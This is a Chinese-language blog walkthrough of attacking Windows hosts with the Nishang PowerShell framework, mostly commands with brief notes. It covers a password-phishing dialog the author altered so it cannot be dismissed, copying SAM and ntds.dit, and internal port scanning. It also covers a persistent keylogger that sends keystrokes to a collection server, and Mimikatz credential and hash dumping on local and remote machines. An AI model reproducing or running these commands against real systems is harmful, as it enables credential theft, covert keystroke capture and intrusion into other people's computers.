Nishang 模块攻击实战

windows 中已导入模块 nishang.psm1

1.Check-VM

检测当前机器是否为一台已知的虚拟机。通过检测已知的虚拟机的指纹信息(如 Hyper-V、VMware、Virtual PC、Virtual Box、Xen、QEMU)来识别。

2.Invoke-CredentialsPhish

作用:欺骗目标主机的用户,让用户输入密码

可更改脚本,不输入正确密码关闭不了对话框,只能强制结束进程。这样做成功得到明文的管理员账户密码

3.Copy-VSS

利用 Volume Shadow Copy服务复制sam文件,如果这个脚本运行在了 DC服务器上,ntds.dit 和 SYSTEM hive也能被拷贝出来

copy-vss    //直接将文件保存在当前目录下
copy-vss -DestinationDir 路径    //指定保存文件的路径(必须是已经存在的路径)

4.FireBuster FireListener扫描器

用于对内网进行扫描,打开本地监听,然后FireBuster远程传送数据,把包发个FireListener

(FireBuster对内网进行扫描,包发送给FireListener)

FireListener 130-150    //本机设置,监听端口
FireBuster 192.168.110.148 130-150 -Verbose    //目标机ip、扫描端口

5.Keylogger 键盘记录

目前为止所见过功能最强大的键盘记录

Get-Help .\nishang\gather\keylogger.ps1 -full    //注意keylogger.ps1 相对存放路径

//(1)键盘记录会保存在当前用户 Temp 目录下的 key 文件
.\nishang\gather\keylogger.ps1   
dir "\key.log*" /s    //寻找key.log文件 (cmd)

 找不到当前用户的temp目录,然后通过命令行进行搜索,发现有一个 appdata,又看不到,猜测应该是一个隐藏文件夹,打开控制面板显示隐藏文件夹(文件颜色 相对于 正常文件有点浅),或者通过搜索出来的路径直接访问文件

 

//(2)-CheckURL参数会检查所给出的网页之中是否包含 -MagicString 后的字符串,如果存在就停止使用记录(MagicString 后面添加不了字符串,如果stopthis存在),跟(1)作用差不多
.\nishang\gather\keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis   

//(3)将记录指定发送给一个可以记录Post请求的web服务器
.\nishang\gather\keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php    

//(4)实现持久化记录(重启后依然进行记录)
.\nishang\gather\keylogger.ps1 -persist     

 生成 key.log 文件后,需要使用 Nishang Utility 中的 Parse_Keys 解析文件,会出现解析后的按键记录(在解析之前,先移动 key 文件到当前的目录)

Parse_keys .\key.log .\parsed.txt    //两个文件都是相对路径

  (key.log)    (parsed.txt)

6.Invoke-Mimikatz

抓取密码

//(1)Dump 出本机的凭证信息
Invoke-Mimikatz -DumpCreds

//(2)Dump 出远程的两台计算机的凭证信息
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2") 

//(3)在远程一台机器上运行Mimikatz并执行"privilege::debug exit"
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1" 

(win10测试,防毒后来关了)

7.Get-PassHashes

这个脚本在 Administrator 的权限下可以 Dump 出密码哈希值,来源于 Metasploit 中的 Power Dump 模块,但在其基础上做出了修改,使得不需要 SYSTEM 权限就可以 Dump

Get-PassHashes

8.获取用户的密码提示信息

这个脚本可以从 Windows 获得用户密码的提示信息,需要有 Administrator 的权限来读取sam hive。可以根据提示信息生成密码字典,能大大提高爆破的成功率。甚至有相当一部分人会将明文密码记录在这个提示信息中

get-PassHints

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值